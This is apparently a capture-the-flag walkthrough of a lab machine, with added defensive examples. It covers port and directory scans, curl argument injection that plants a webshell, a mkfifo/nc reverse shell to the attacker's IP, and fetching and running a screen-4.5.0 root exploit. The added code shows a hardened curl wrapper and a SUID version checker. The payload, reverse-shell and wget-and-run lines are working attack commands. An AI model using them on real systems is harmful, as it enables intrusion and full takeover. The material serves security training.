Basic information

Port scan

Only 22 and 80 are open:

$ nmap -sC -sV 10.10.10.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 13:55 CST
Nmap scan report for 10.10.10.24
Host is up (0.067s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.92 seconds

Port 80

Just a single image:

Directory scan

Brute-forcing directories turns up uploads and exposed.php:

gobuster dir -u http://10.10.10.24/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100

/index.html (Status: 200)
/uploads (Status: 301)
/test.html (Status: 200)
/hair.html (Status: 200)
/exposed.php (Status: 200)

exposed.php

This page performs its check by calling curl directly on the URL you give it:

webshell

Since the user-supplied URL lands on curl's command line, we can inject extra curl arguments and have curl itself write a webshell into the web root; we already saw the writable-looking uploads directory earlier. The value submitted to exposed.php (shell.php is served from the attacker box on 10.10.14.12:7777, and the injected -o makes curl save it as uploads/shell.php):

http://10.10.14.12:7777/shell.php -o uploads/shell.php
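How the argument injection works, as an added example that is not part of the original writeup or the box's own code: the source of exposed.php is not shown on the page, so the vulnerable pattern below is an assumed reconstruction of the same class of bug (user input pasted unquoted into a `curl` command line that `sh` then word-splits), placed beside a hardened form. Hosts and paths are taken from the writeup; nothing here touches the network, the functions only show the argv curl would receive.

```sh
#!/bin/sh
# Added example, not the box's exposed.php: the vulnerable pattern is an
# assumed reconstruction of "shell_exec('curl ' . $_GET['url'])"-style code.

# Vulnerable: the user string lands unquoted on a command line, so sh splits it
# on whitespace and curl receives the extra words as options.
# Prints the number of argv words curl would get (1 for a clean URL).
vulnerable_argc() {
    # shellcheck disable=SC2086   # the missing quotes ARE the bug
    set -- $1
    echo $#
}

# Same split, one argv word per line, so the injected "-o uploads/shell.php"
# is visible as two separate arguments following the URL.
vulnerable_argv() {
    # shellcheck disable=SC2086
    set -- $1
    printf '  argv[]: %s\n' "$@"
}

# Hardened: allow only http(s) URLs built from a conservative character set
# (no whitespace, quotes or shell metacharacters), then pass the value as ONE
# argument after "--" so curl never parses it as an option even if it starts
# with "-". In PHP the equivalent is escapeshellarg() plus the "--" terminator.
safe_curl_cmd() {
    url=$1
    case "$url" in
        http://*|https://*) ;;
        *) echo "rejected: only http/https URLs allowed" >&2; return 1 ;;
    esac
    case "$url" in
        *[!A-Za-z0-9:/._?=\&%~-]*) echo "rejected: disallowed character" >&2; return 1 ;;
    esac
    # printf stands in for executing: curl -sS --max-time 5 -- "$url"
    printf 'curl -sS --max-time 5 -- %s\n' "$url"
}

# Demo with the payload from the writeup (constructed input, runs offline):
payload='http://10.10.14.12:7777/shell.php -o uploads/shell.php'
echo "vulnerable: curl receives $(vulnerable_argc "$payload") argument(s):"
vulnerable_argv "$payload"
echo "hardened:"
safe_curl_cmd "$payload" || echo "  (payload rejected)"
```

The allow-list is deliberately stricter than RFC 3986; for a "is this URL reachable" check that is the right trade-off, since anything the check does not need to accept is attack surface. Note that quoting alone is not enough: a quoted value that starts with `-` is still an option to curl, which is why the `--` terminator matters.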

user flag

# reverse shell: the FIFO carries the listener's input into sh and sh's output back to nc (assumes a listener such as nc -lvnp 4444 on the attacker box)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4444 >/tmp/f

The shell runs as www-data, but that is already enough to read user.txt on maria's desktop, since the file is world-readable:

Privilege escalation information

Listing SUID files reveals screen-4.5.0, a version with a known local privilege escalation:
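The SUID enumeration and version check behind this step, as an added example that is not part of the original writeup (the exp.sh used later is not shown on the page and is not reproduced here). It assumes a POSIX shell with find and awk; the version strings in the comments and tests are constructed samples in the format `screen -v` prints. GNU screen up to and including 4.5.0 is affected by CVE-2017-5618 (fixed in 4.5.1): when the binary is SUID root, its logfile handling lets an unprivileged user write to files as root, which is the known screen-4.5.0 privilege escalation.

```sh
#!/bin/sh
# Added example, not from the writeup: the SUID enumeration step plus a
# numeric version check for any GNU screen binary it turns up.

# Every SUID binary on local filesystems (the step that revealed screen-4.5.0).
list_suid() {
    find / -xdev -perm -4000 -type f 2>/dev/null
}

# Given the first line of "<binary> -v", exit 0 if it is GNU screen <= 4.5.0
# (CVE-2017-5618, fixed in 4.5.1), 1 if it is newer, 2 if it is not screen -v
# output at all. screen zero-pads its fields, e.g.
# "Screen version 4.05.00 (GNU) 10-Dec-16" (constructed sample), so the
# fields are compared as numbers, never as strings.
screen_version_vulnerable() {
    printf '%s\n' "$1" | awk '
        BEGIN { rc = 2 }
        $1 == "Screen" && $2 == "version" {
            split($3, v, ".")
            n = (v[1] + 0) * 10000 + (v[2] + 0) * 100 + (v[3] + 0)
            rc = (n <= 40500) ? 0 : 1
            exit
        }
        END { exit rc }
    '
}

# Run the check against every SUID file whose name contains "screen".
# Only executed when the script is invoked as: ./suidscreen.sh --scan
scan_suid_screen() {
    list_suid | grep -i screen | while IFS= read -r bin; do
        out=$("$bin" -v 2>&1 | head -n 1)
        if screen_version_vulnerable "$out"; then
            echo "VULNERABLE  $bin  ($out)"
        else
            echo "ok          $bin  ($out)"
        fi
    done
}

if [ "${1:-}" = "--scan" ]; then
    scan_suid_screen
fi
```

The name-based grep is a convenience for this box, where the binary was literally called screen-4.5.0; on a real engagement the full `list_suid` output should be reviewed by hand, since a renamed copy of a vulnerable SUID binary is exactly the kind of thing a filename filter misses.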

Privilege escalation && root flag

One-shot exploit:

python3 -c 'import pty; pty.spawn("/bin/bash")'   # upgrade to a real TTY first: screen refuses to start without one
wget http://10.10.14.12:7777/exp.sh                # exploit script served from the attacker box
chmod +x exp.sh
./exp.sh

References